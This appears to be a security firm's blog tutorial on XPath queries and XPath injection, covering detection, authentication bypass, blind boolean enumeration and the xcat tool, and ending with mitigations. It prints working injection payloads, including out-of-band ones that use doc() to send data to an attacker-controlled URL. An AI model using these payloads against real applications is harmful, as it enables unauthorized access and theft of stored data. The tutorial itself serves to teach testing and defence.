Exploring XPath in XML documents

What is XPATH?

XPATH is a standard language used to query and navigate XML documents. It makes use of Path expressions to select node from an XML document based on certain criteria.
Think of it as SQL for XML.

Table of Contents

Let us take an example. Suppose our XML document is in the format below.

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
    <user id='1'>
        <username>jason</username>
        <password>passjason</password>
    </user>
    <user id='2'>
        <username>chris</username>
        <password>chrispass</password>
    </user>
</users>

To extract information regarding user named ‘Jason’, our xpath query would be: /users/user[username/text() =’jason’]

This query will retrieve all the data from the user element where username matches jason.

Now you might be thinking, how did we end up with this query? Don’t worry! Let me take you to some of the most used expressions.

XPATH Expressions

Expression	Details
/	Select the document node
//	Select all nodes regardless of their position in document
node_name	Select all nodes with ‘node_name’
@	Select attributes
[element and condition]	Select all nodes that match the defined
*	Matches any element node

With this knowledge, we can try to change our above XPATH query to:

//user[username/text()='jason']
//user[@id='1']
and I’ll leave the rest for you to explore.

Attacking XPATH Queries

According to Portswigger,

XPath injection vulnerabilities arise when user-controllable data is included in XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Similar to SQL Injection, XPath Injection can be used to bypass business logic, escalate user’s privileges, and leak sensitive data. Successful exploitation of this flaw often leads to the compromise of the entire XML database.

Detection

It’s quite similar to SQL Injection. In order to detect this vulnerability, the first step is to insert a single quote (’) in the field to be tested, introducing a syntax error in the query and checking whether the application returns an error message.

In cases where error messages are suppressed, we can switch to Boolean-based Injection techniques, making the query either TRUE or FALSE.

Few points to note:

Unlike SQL Injection, XPATH does not permit comments expression.
Unlike SQL Injection, XPATH is a case-sensitive language.

Exploitation

Let’s start with basic exploitation to bypass authentication. For this, suppose the application uses the below query for authentication purpose:

string(//user[username/text()='<user-input>' and password/text()='<user-input>']/account/text())

As XPath language does not allow comments inside the query itself, exploitation might become a bit trickier due to the presence of the Boolean operator AND.

In this case, if the tester uses the following values:

username= ' or '1' or '1
password= ' or '1' or '1

Now the query becomes,
string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())

which will always be evaluated as true, and the application will authenticate the user.

Blind Exploitation

As the XPATH language does not have a statement similar to UNION in SQL due to which, to dump the whole XML database, we’ll have to switch to blind exploitation techniques.

For demonstration purposes, we’ll be using a vulnerable application found on github.

Manual Approach

The application allows us to search for books. As application shows the query used by backend but let’s ignore that for a moment.

Let’s start with our usual fuzzing. On inserting single quote (’), application returns an error.

On further fuzzing, we found that a’) and (‘1’=’1 completes the query, making final query to be:
/root/books/book[contains(title/text(), 'a') and ('1'='1')]

We can change the input to a false condition (1=2), application now returns 0 results

Now we know the application behavior based on True and False conditions, we can create our payload to dump the backend database.

From the XPATH documentation, we found a few interesting functions which can be useful such as count, substring, and others.

Next, we need to find the structure of the document. To do this, we will use the count function to get a basic understanding of the document.

a') and count(/*)>1 and ('1'='1 -> returns FALSE
a') and count(/*)=1 and ('1'='1 -> returns True

This confirms that the document contains one root node.

Similarly,

a') and count(/*[1]/*)=2 and ('1'='1 -> returns True

means, there are two elements in the root node. Using this technique, we can enumerate the whole structure of the XML document.

Once we know the structure, we can start enumerating the names of the elements. For this purpose, we can use the name() function. As it’s blind, we’ll have to enumerate its characters one-by-one with the help of the substring() function.

For finding the name of the root element, our payload will be
a') and substring(name(/*),1,1)='{char}' and ('1'='1, where char is characters from a to z
- name(/*): selecting name of the root node

For finding name of the child element of root node,
a') and substring(name(/*[1]/*),1,1)='{char}' and ('1'='1
- name(/*[1]/*: selecting name of first element in root node

This process can take some time and limit the characters needed to be in the ASCII space.

For this purpose, string-to-codepoints function can be used which returns the Unicode codepoint value of the given string.

OOB Exploitation

The doc() function allows to retrieve a document using a URI path and returns the corresponding document node. It allows us to retrieve documents locally or remotely.

We can provide an attacker-controlled URI to the function such as doc(concat('http://attacker.com/', <value we want>)), the application will make an HTTP request to our website with the name of the root node.

Our payload will be:
a') and doc(concat('http://172.17.0.1/data/?d=', name(/*)))/data and ('1'='1

Here,

Application tries to fetch the XML file remotely from attacker-controlled URL
name(/*) returns the root node of the XML document
/data, is trying to retrieve the data element from the XML file

The name of first node in our XML document is “root”, we can use the same technique to extract name of its child note using:
a') and doc(concat('http://172.17.0.1/data/?d=', name(/*[1]/*)))/data and ('1'='1

This is a way we can enumerate and dump the whole document. This technique is comparatively faster than Boolean Injection.

As URLs also have some limitations, we need to encode our string in order to make the format suitable for making the HTTP request using encode-for-uri function.

Using Xcat

Xcat is a command-line tool to exploit and investigate blind XPATH-Injection vulnerabilities. Xcat makes our exploitation much easier and faster. We can dump the whole XML document in merely 28 secs.

time xcat run 'http://xpath.site:8000' query query=a --true-string Lawyer
...[snip]..

real    27.85s
user    21.26s
sys     1.41s
cpu     81%

Mitigation

There are several things that can be done to mitigate the risk of XPATH Injection:

Input Validation:
Always validate user input before using it in an XPATH expression, which will help preventing malicious code being injected in the application.
Using Parameterized Queries:
Parameterized XPATH queries allow the use of placeholder for user-supplied input which helps in preventing malicious users from manipulating the query.
Using Precompiled XPATH queries:
Precompiled XPATH Queries are queries that are prepared before the program’s execution, rather than created dynamically using user-input. This reduces the risk of manipulating the query.

Conclusion

XPATH queries is a powerful tool for XML processing, however, it also presents a potential risk of exploitation through XPATH injection attacks if not handled properly.

In this blog, we have explored different ways to exploit XPATH Injection, and gained some insight into their potential consequences and their effective mitigation strategies.

Thanks for reading; I hope you learned something new from this blog.

Reference:

Subscribe to our Newsletter

Services

Products

Who we are

Resources

Tools

Community

Contact Us

Top Openings

Employee Centric Work Culture

Never Stop Learning

Cohere with the Community